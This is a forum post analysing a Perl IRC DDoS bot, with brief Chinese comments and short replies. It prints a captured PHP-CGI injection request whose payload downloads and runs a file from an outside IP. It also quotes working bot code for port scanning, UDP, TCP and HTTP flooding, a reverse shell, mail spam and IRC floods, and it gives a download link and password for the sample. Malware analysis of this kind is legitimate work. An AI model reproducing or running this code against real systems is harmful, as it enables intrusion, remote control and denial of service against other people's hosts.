网站 › 『病毒分析区』 › DDoS Perl lrcBotv1.0分析

Cherishao 发表于 2018-2-2 17:51

DDoS Perl lrcBotv1.0分析

# DDoS Perl lrcBotv1.0分析


### 0x10 对.cap分析

WireShark追踪流量包，发现异常如下：

```bash
POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1

Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 194

<? system("cd /tmp ; wget http://167.88.**.**/js/zmuie ; curl -O http://167.88.**.**/js/zmuie; fetch http://167.88.**.**/js/zmuie ; chmod +x zmuie ; ./zmuie ; perl zmuie; rm -rf zmuie* "); ?>
#系统打开tmp文件夹，通过wget/curl/fetch得到资源zmuie;给zmuie赋予可执行权限，编译，然后执行，最后删除
```



### 0x20 对.perl文件进行分析

#### 1、端口扫描

```bash
###########端口扫描，对1到65533个端口进行扫描
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Scanning for open ports on 12".$1." 9,1started. ");
foreach my $porta (@portas){
    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
    if ($scansock) {
      push (@aberta, $porta);
      $scansock->close;
    }
}
if (@aberta) {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Open ports found: 12@aberta ");
    } else {
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1No open ports found. ");
}
}
```

#### 2、正则匹配文件目录

```bash
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {##通过正则匹配下载文件目录
      getstore("$1", "$2");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Downloaded the file: 12$2 9,1from 12$1 ");##文件位置
}
##############
if ($funcarg =~ /^dns\s+(.*)/){ #解析DNS
      my $nsku = $1;
      $mydns = inet_ntoa(inet_aton($nsku));
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) { #尝试验证上述列出可用端口
      my $hostip= "$1";
      my $portsc= "$2";
      my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
      if ($scansock) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
      }
      else {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
      }
}
```

#### 3、通过UDP-1进行DDos

```bash
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-1进行DDos
    return unless $pacotes;
    socket(Tr0x, PF_INET, SOCK_DGRAM, 17); #通过socket通信
    my $alvo=inet_aton("$1");
    my $porta = "$2";
    my $dtime = "$3";
    my $pacote;
    my $pacotese;
      my $size = 0;
    my $fim = time + $dtime;
    my $pacota = 1;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Attacking 12".$1." 9,1On Port 12".$porta." 9,1for 12".$dtime." 9,1seconds. ");
      while (($pacota == "1") && ($pacotes == "1")) {
            $pacota = 0 if ((time >= $fim) && ($dtime != "0"));
            $pacote = $size ? $size : int(rand(1024-64)+64) ; #文件大小限制在1024个字节内
            $porta = int(rand 65000) +1 if ($porta == "0");
            #send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
            send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
            }
    sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Attack for 12".$1." 9,1finished in 12".$dtime." 9,1seconds9,1. ");
}
```

####4、通过UDP-2进行DDos

```bash
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) { #通过UDP-2进行DDos
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Attacking 12".$1." 9,1with 12".$2." 9,1Kb Packets for 12".$3." 9,1seconds. ");
      my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); #udpflood使受攻击的机器访问速度变慢，大量资源被占用
      $dtime = 1 if $dtime == 0;
      my %bytes;
      $bytes{igmp} = $2 * $pacotes{igmp};
      $bytes{icmp} = $2 * $pacotes{icmp};
      $bytes{o} = $2 * $pacotes{o};
      $bytes{udp} = $2 * $pacotes{udp};
      $bytes{tcp} = $2 * $pacotes{tcp};
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 9,1Kb in 12".$dtime." 9,1seconds to 12".$1."9,1. ");
}
```

#### 5、通过TCP进行DDos

```bash
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) { #TCP进行DDos
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Attacking 12".$1.":".$2." 9,1for 12".$3." 9,1seconds. ");
      my $itime = time;
      my ($cur_time);
      $cur_time = time - $itime;
      while ($3>$cur_time){
      $cur_time = time - $itime;
      &tcpflooder("$1","$2","$3");#udpflood使受攻击的机器访问速度变慢，大量资源被占用
}
      sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1  9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
```

#### 6、通过HTTP协议DDos

```bash
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 9,1Attacking 12".$1." 9,1on port 80 for 12".$2." 9,1seconds. ");
      my $itime = time;
      my ($cur_time);
      $cur_time = time - $itime;
      while ($2>$cur_time){
      $cur_time = time - $itime;
      my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
      print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
      close($socket);
}
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Attacking ended on: 12".$1."9,1. ");
}
```

###0x30 函数解析

#### 1、getprotobyname

```bash
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) { #通过getprotobyname()返回tcp信息获取主机的地址IP,端口
      my $host = "$1";
      my $port = "$2";
      my $proto = getprotobyname('tcp');
      my $iaddr = inet_aton($host);
      my $paddr = sockaddr_in($port, $iaddr);
      my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") { #判断操作系统是否匹配Win32，如果是则启动cmd.exe，并且通过socket通信
      $shell = "cmd.exe";
}
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Connecting to 12$host:$port ");
      socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
      connect(SOCKET, $paddr) or die "connect: $!";
      open(STDIN, ">&SOCKET");
      open(STDOUT, ">&SOCKET");
      open(STDERR, ">&SOCKET");
      system("$shell");#启动系统shell
      close(STDIN);
      close(STDOUT);
      close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {#通过mail发送/usr/sbin/sendmail
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Sending email to: 12$3 ");
      $subject = $1;
      $sender = $2;
      $recipient = $3;
      @corpo = $4;
      $mailtype = "content-type: text/html";
      $sendmail = '/usr/sbin/sendmail';
      open (SENDMAIL, "| $sendmail -t");
      print SENDMAIL "$mailtype\n";
      print SENDMAIL "Subject: $subject\n";
      print SENDMAIL "From: $sender\n";
      print SENDMAIL "To: $recipient\n\n";
      print SENDMAIL "@corpo\n\n";
      close (SENDMAIL);
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1Email Sended to: 12$recipient ");
}
exit;
}
}

```

#### 2、IRC拒绝服务式攻击

IRC网络上进行flood将用户与IRC服务器（拒绝服务的形式）断开连接的方法，耗尽带宽，导致网络延迟。

```bash
##############由于ctcp几乎在每个客户端都被实施，大多数用户对CTCP请求做出响应，通过发送太多请求，经过几个路由，他们将从IRC服务器断开连接。最广泛使用的类型是ping，CTCP。
if ($funcarg =~ /^ctcpflood (.*)/) {
    my $target = "$1";
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1CTCP Flooding: 12".$target." ");
      for (1..10) {
      sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001VERSION\001\n");
      sendraw($IRC_cur_socket, "PRIVMSG ".$target." :\001PING\001\n");
      }
}
##############
#msgflood向受害者发送大量私人消息，造成资源占用和拥堵。
if ($funcarg =~ /^msgflood (.*)/) {
    my $target = "$1";
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1MSG Flooding: 12".$target." ");
    sendraw($IRC_cur_socket, "PRIVMSG ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
#noticeflood与msgflood类似，使用notice命名造成资源占用拥堵
if ($funcarg =~ /^noticeflood (.*)/) {
    my $target = "$1";
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1  9,1NOTICE Flooding: 12".$target." ");
      for (1..2){
      sendraw($IRC_cur_socket, "NOTICE ".$target." :0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
      }
}
##############

```

### 0x40 相关下载

链接：https://pan.baidu.com/s/1pMZrT27 密码：08gy ，压缩包的提取密码：52pojie

程序不含木马，病毒，分析环境为Win7，建议在52虚拟机中运行。


理想呦 发表于 2018-2-2 18:48

前排沙发，谢谢分享，收藏先






神奇的小尾巴：Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4033.400 QQBrowser/9.6.12624.400(zh-CN)
——2018/2/2 下午6:48:54         

dshyhome 发表于 2018-2-2 19:27

好资源，谢谢分享:handshake

萌萌哒的小白 发表于 2018-2-2 20:23

谢谢分享，收藏先

纯黑的噩梦 发表于 2018-2-6 15:50

这个怎么用:lol

查看完整版本: DDoS Perl lrcBotv1.0分析